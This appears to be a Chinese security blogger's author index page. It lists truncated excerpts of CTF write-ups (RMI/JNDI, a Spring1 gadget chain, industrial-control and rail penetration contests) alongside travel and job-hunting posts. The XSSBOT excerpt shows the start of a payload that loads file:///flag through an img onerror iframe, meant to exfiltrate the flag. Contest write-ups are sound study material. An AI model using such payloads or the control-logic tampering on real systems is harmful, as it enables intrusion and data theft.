作者: thaii

178 篇文章

3rm1 tctf/0ctf wp
3rm1 tctf/0ctf wp 代码审计 有客户端(flag)和服务端 jdk8u201 (!=jdk8u121,无JEP290限制;jdk>191, 若jndi注入需要考虑高版本) 客户端 非spring javawebmvc,核心代码 try { LocateRegistry.getRegistry("rmiserver&q…
spring1分析
spring1 分析 条件 所需依赖是: spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE pom.xml <!-- https://mvnrepository.com/artifact/org.springframework/spring-core --> <depend…
汕头纪行
汕头纪行 序 汕头,一个海滨城市,同时也是生我的地方,也是我祖先沉睡的地方。这小公园的行人来来去去,龙眼路的木棉花开花落,新津河的渔船聚聚散散,春去秋来,我也在这里从母亲的襁褓到独自一人去住宿学校,从天天出门拿着无花果和邻居到处扔和追逐到躲在房间里和同学暗无天日的玩手游,从不写作业被老师打手掌心到高考发誓要考上理想的大学,这里承载了我太多的情感和回…
2023冬招校招面经之路
2023冬招校招面经之路 背景 就是前面梭哈基本只投广东的web安全岗(代码审计/渗透测试/红蓝对抗)结果0 offer(2023.12),劝各位不要这样,然后合规岗(得物),安卓渗透(oppo/美团,荣耀今年毁意向可能就算了),iot(车企如理想零跑)之类的其实也可以试试(后面有实测例子),增大拿offer可能性 国企类就都投即可 起这个名字是因…
成都纪行2.0
成都纪行2.0 上回说过, 我们都还没来得及说再见,所以,我不会把它当做离别。 所以我回来了,成都! 1.15-深圳起飞 教大家一个技巧,飞机在倾斜时,窗会朝向地面,这时可以拍地上的景色(多见于起飞) 看到这里感觉深圳夜之城非常赛博朋克 飞机餐也增色不少,算是最近坐的几趟飞机里比较好吃的那种 比较好笑的是 有人下飞机前都没有把图片右下角的玉米火腿粒…
合肥纪行
合肥纪行 序 填之前的坑了,顺便把一些有的没的记录一下,以后也可以翻翻 合肥安徽省省会,因淝、施二水交汇而得名,位于中国中部,长江淮河之间、巢湖之滨,具有承东启西、接连中原、贯通南北的重要区域优势,是全省政治、经济、文化、信息、金融和商业贸易中心,也是全国重要的科研教育基地。 合肥是一座具有2000多年历史的古城,素有“三国故地、包拯家乡”之称。曾…
鹏城杯2023wp-决赛-深圳-day3
2023-鹏城杯决赛wp-day3 最终成绩 石油石化自动控制安全2 该场景是模拟天然气采集、输送和净化的生产工艺流程,主要生产设备包括采气井、测量仪表、管道、锅炉、脱硫装置、脱水装置。靶标设备为工程师站实物和生产控制系统(PAC)实物。选手对需现场控制逻辑进行篡改,实现危险操作。选手需要提交报告说明整个过程。该场景需要完成石油石化自动控制安全1后…
鹏城杯2023wp-决赛-深圳-day2
鹏城杯2023wp-决赛-深圳-day2 轨道交通列控场景(1000分拿满) 渗透测试 1000 描述: 该场景模拟了监测网络和生产网络为两个网络,攻击者需通过监测系统网络向列车运行控制系统网络渗透的场景。 要求选手首先攻陷联锁设备(地址:192.168.11.103),以联锁设备为跳板进一步渗透生产网区域;选手需要攻陷调度服务器,通过调度软件为列…
鹏城杯2023wp-决赛-深圳-day1
鹏城杯2023wp-决赛-深圳-day1 手册 大家有些选手不及时 出席的 ,第一次进入鹏城实验室 没有腕带 就报来由,还是不行 就大打 选手手册 中 留的 紧急联系电话:18529592717(李老师) 大家注意哈,明天比赛 请从 上图中的 鹏城实验室 东门进入,门卫统一在 东门 审核身份,提问来由请回复“参加鹏城杯决赛,已报备”。感谢您的配合!…
xctf-TPCTF wp
xctf-TPCTF wp 还得是xctf,现在xctf的web题都没web界面了屌 XSSBOT 想法很简单,直接读文件然后外带 <img src="xasdasdasd" onerror="document.write('<iframe src=file:///flag></ifr…